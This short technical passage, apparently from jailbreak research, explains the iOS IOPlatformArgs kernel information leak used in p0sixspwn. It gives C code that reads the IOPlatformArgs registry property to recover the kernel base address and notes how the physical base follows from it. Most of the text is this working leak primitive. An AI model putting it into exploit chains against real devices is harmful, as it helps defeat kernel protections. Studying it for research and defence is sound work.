The IOPlatformArgs vulnerability leaks the kernel base address. Used in p0sixspwn.
static uint32_t
get_kernel_base_boot_args(void)
{
CFStringRef parameter = CFSTR("IOPlatformArgs");
CFDataRef data;
io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOPlatformExpertDevice"));
if (platformExpert)
{
data = IORegistryEntryCreateCFProperty(platformExpert,
parameter,
kCFAllocatorDefault, 0);
}
IOObjectRelease(platformExpert);
CFIndex bufferLength = CFDataGetLength(data);
UInt8 *buffer = malloc(bufferLength);
CFDataGetBytes(data, CFRangeMake(0,bufferLength), (UInt8*) buffer);
typedef struct {
uint32_t deviceTreeP;
uint32_t bootArgs;
uint32_t zero;
uint32_t zero_1;
} platformArgs;
platformArgs IOPlatformArgs;
bcopy(buffer, &IOPlatformArgs, sizeof(IOPlatformArgs));
return IOPlatformArgs.bootArgs;
}
Once the attacker knows the virtual base, they can use the virt_to_phys macro to see what the physical base is, this way both bases are leaked. This all relies on the IOPlatformArgs bug.
